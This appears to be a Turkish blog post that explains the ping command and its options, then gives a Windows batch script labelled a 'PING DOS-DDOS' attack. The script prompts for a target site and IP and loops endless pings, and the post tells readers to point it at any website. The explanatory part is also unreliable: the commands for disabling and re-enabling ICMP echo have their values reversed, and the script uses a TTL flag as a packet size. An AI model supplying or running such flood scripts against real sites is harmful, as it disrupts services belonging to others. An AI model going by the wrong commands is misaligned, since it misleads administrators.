“ping “ Bu komut ağ üzerinde bulunan iki bilgisayar arasındaki olası bir ağ bağlantı kaybı testi için kullanılan bir komuttur.
“Internet Denetim İletisi” “İletişim Kuralı” (ICMP) “Yankıİsteği” iletileri göndererek, başka bir TCP/IP bilgisayara IP düzeyinde bağlanılırlığı doğrular. Karşılık olarak gelen“Yankı İsteği” iletileri, iletim süreleriyle birlikte görüntülenir. bağlantı, erişim ve ad çözümleme sorunlarının giderilmesinde kullanılan birincil TCP/IP komutu ping’dir Ping, parametresiz kullanıldığında yardımı görüntüler.
Ping komut seçenekleri
- c sayı: Sayı ile belirtilen kadar ping paketi gönderdikten sonra programdan çıkılmasını sağlar. Bu seçenek kullanılmadığı takdirde ping programı kullanıcıdan kapatma isteği gelene kadar çalışacaktır. En basit kapatma isteği CTRL-C tuşları ile verilir.
ping -c 5 192.168.2.1
- -f: Çok hızlı olarak ping paketi üretilmesini sağlar. Sadece root kullanıcısı tarafından
kullanılabilir. Ağ üzerinde yavaşlatıcı etken yapabileceğinden dikkatli kullanılması gerekmektedir. - -i süre: Her bir ping paketinin gönderilmesi arasında geçmesi gereken surenin
ayarlanması için kullanılır. Belirtilen süre saniye cinsindendir. Bu seçenek kullanılmadığı takdirde her bir saniyede bir ping paketi gönderilir. -f seçeneği ile uyumsuzdur. - -n: Bu seçenek kullanıldığı takdirde ping isteği gönderilen makineden gelen cevapların kullanıcıya gösterilmesi sırasında makinenin ismi yerine IP adresi kullanılır.
- -s paket büyüklüğü: Gönderilecek ping paketinin büyüklüğünün ayarlanması için
kullanılır. Varsayılan paket büyüklüğü 56 byte’tir. 8 bytelık ICMP başlık bilgisi ile paket boyu 64 byte’a çıkar.
Ping komutunu, hem bilgisayar adını hem de bilgisayarın IP adresini sınamak için kullanabilirsiniz. IP adresi için yapılan ping başarılı; ancak bilgisayar adı için yapılan ping başarısız olmuşsa, bir ad çözümleme sorunu ortaya çıkabilir. Böyle bir durumda, belirteceğiniz bilgisayar adının, Etki Alanı Ad Sistemi (DNS) sorguları veya NetBIOS ad çözümleme teknikleri kullanılarak yerel Ana Makineler dosyasıyla çözülebilir olduğundan emin olunuz.
Linux sunucuda Ping devre dışı bırakma
Güvenlik için bazen ihtiyaç duyulan ping servisini devre dışı bırakmak için ;
echo 0 >/proc/sys/net/ipv4/icmp_echo_ignore_all
Tekrar açmak için ;
echo 1 >/proc/sys/net/ipv4/icmp_echo_ignore_all
Basit Ping Atak (BAT Dosyası)
Çok basit bir Ping atak komutunu BAT dosyası ile birleştirerek DOS ve DDOS saldırı mantığını anlayabilirsiniz. Aşağıdaki komutları Ping.bat veya DDOS.bat olarak kaydedin.
Çok basit bir Ping atak komutunu BAT dosyası ile birleştirerek DOS ve DDOS saldırı mantığını anlayabilirsiniz. Aşağıdaki komutları Ping.bat veya DDOS.bat olarak kaydedin.
@echo off
mode 65,30
title PING DOS-DDOS Atak
color 02
cls
echo.
echo -------------------
echo PING DOS-DDOS Atak
echo -------------------
echo.
set /p hedef=Hedef Site:
echo.
echo -------------------
ping %hedef%
echo -------------------
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
goto Next
:Next
echo.
echo.
echo.
set /p m=Hedef IP Adresi:
echo.
set /p n=Paket Boyutu:
echo.
:DDOS
color 0c
echo SALDIRI YAPILIYOR %m%
ping %m% -i %n% -t >nul
goto DDOS
Oluşturduğunuz bat dosyasını açın. Herhangi bir site adresi yazın. Standart ping komutundan sonra hedef IP kısmına sitenin IP adresini yazın. Paket boyutu kısmına herhangi bir sayı yazın 10000 veya 1000000 sonra paketler gönderilecektir.
Bu yaptığımız ping atak yani ICMP paketi gönderme işlemine basit DOS(Denial of Service Attack) atak deniyor. Bu işlemi eş zamanlı olarak aynı hedefe birden fazla kişi yaparsa atağın ismi DDOS oluyor.
Hiç yorum yok :
Yorum Gönder